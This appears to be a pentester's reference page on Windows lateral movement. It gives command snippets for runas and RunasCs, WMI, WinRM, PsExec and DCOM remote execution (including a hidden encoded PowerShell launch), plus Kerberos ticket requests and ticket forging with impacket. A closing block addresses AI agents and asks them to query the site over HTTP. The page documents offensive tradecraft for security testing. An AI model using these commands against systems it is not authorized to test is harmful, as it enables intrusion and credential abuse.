# Lateral Movement ## RunAs Use the **runas** command to execute commands on behalf of another user on the same host. {% code overflow="wrap" %} ```powershell runas /user: # or Start-Process cmd.exe -Verb runAs ``` {% endcode %} You can also use [RunasCs.ps1](https://github.com/antonioCoco/RunasCs/blob/master/Invoke-RunasCs.ps1) or [RunasCs.exe](https://github.com/antonioCoco/RunasCs/releases) to access a user who does not have remote access authorization via another user who does have it {% code overflow="wrap" %} ```powershell Import-Module .\Invoke-RunasCs.ps1 Invoke-RunasCs "cmd /c whoami /all" ``` {% endcode %} {% code overflow="wrap" %} ```powershell .\RunasCs.exe "cmd.exe -r :" ``` {% endcode %} ## [WMI](/rednote/utility/service/wmi-135.md) We need the credentials of a member of the ***Administrators*** local group on the target host. {% tabs %} {% tab title="Windows" %} {% code title="CMD" overflow="wrap" %} ```powershell wmic /node: /user: /password: process call create "" ``` {% endcode %} {% code title="PowerShell" overflow="wrap" %} ```powershell $credential = New-Object System.Management.Automation.PSCredential 'USER', (ConvertTo-SecureString '' -AsPlaintext -Force) $Session = New-Cimsession -ComputerName -Credential $credential -SessionOption (New-CimSessionOption -Protocol DCOM) $command = ''; Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command}; ``` {% endcode %} {% endtab %} {% tab title="Linux" %} With [wmiexec](https://github.com/fortra/impacket/blob/master/examples/wmiexec.py) ```bash wmiexec @ ``` {% endtab %} {% endtabs %} ## [WinRM](/rednote/utility/service/winrm-5985-5986.md) We need the credentials of a member of the ***Administrators*** local group or ***Remote Management Users*** group on the target host. {% tabs %} {% tab title="Windows" %} {% code title="CMD" overflow="wrap" %} ```powershell winrs -r: -u:'' -p:'' "cmd /c " ``` {% endcode %} {% code title="PowerShell" overflow="wrap" %} ```powershell $credential = New-Object System.Management.Automation.PSCredential 'USER', (ConvertTo-SecureString '' -AsPlaintext -Force) New-PSSession -ComputerName -Credential $credential # See ID in the output Enter-PSSession ``` {% endcode %} {% endtab %} {% tab title="Linux" %} With [evil-winrm](https://github.com/Hackplayers/evil-winrm) ```bash evil-winrm -i -u [@] ``` {% endtab %} {% endtabs %} ## PsExec We need the credentials of a member of the ***Administrators*** local group, the *ADMIN$* share available and File and Printer Sharing turned on (both default settings on modern Windows Server systems).
Details To execute the command remotely, PsExec performs the following tasks: * Writes **psexesvc.exe** into the **C:\Windows** directory * Creates and spawns a service on the remote host * Runs the requested program/command as a child process of **psexesvc.exe**
{% tabs %} {% tab title="Windows" %} [psexec](https://learn.microsoft.com/en-us/sysinternals/downloads/psexec) is not installed by default on Windows, we need to transfer it. {% code title="CMD" overflow="wrap" %} ```powershell .\PsExec64.exe -i \\ -u \ -p cmd ``` {% endcode %} {% endtab %} {% tab title="Linux" %} With [psexec](https://github.com/fortra/impacket/blob/master/examples/psexec.py) ```bash psexec @ ``` {% endtab %} {% endtabs %} ## DCOM Interaction with DCOM is performed over RPC on TCP port 135 and local ***Administrator*** access is required to call the DCOM Service Control Manager, which is essentially an API. {% code overflow="wrap" %} ```powershell [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","")).Document.ActiveView.ExecuteShellCommand("powershell",$null,"-nop -w hidden -e ","7") ``` {% endcode %} ## Kerberos Tickets Set `/etc/hosts` and `/etc/krb5.conf` {% code title="/etc/hosts" overflow="wrap" %} ``` ``` {% endcode %} {% code title="/etc/krb5.conf" overflow="wrap" %} ``` [libdefaults] default_realm = forwardable = yes dns_lookup_kdc = false dns_lookup_realm = false [realms] = { kdc = } ``` {% endcode %} Get the `TGT` {% code overflow="wrap" %} ```bash getTGT.py -dc-ip '/:' getTGT.py -dc-ip '/' -hashes : ticketer.py -nthash -domain-sid -domain # or with other techniques ``` {% endcode %} Import it {% code overflow="wrap" %} ```bash chmod 600 .ccache export KRB5CCNAME=.ccache klist ``` {% endcode %} Use with Kerberos authentication (`-k`) ```bash nxc smb --use-kcache --kdcHost psexec.py -k -no-pass -dc-ip [-target-ip ] # also with impacket-secretsdump, impacket-wmiexec, etc. ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://ivalexev.gitbook.io/rednote/pentesting-process/lateral-movement.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.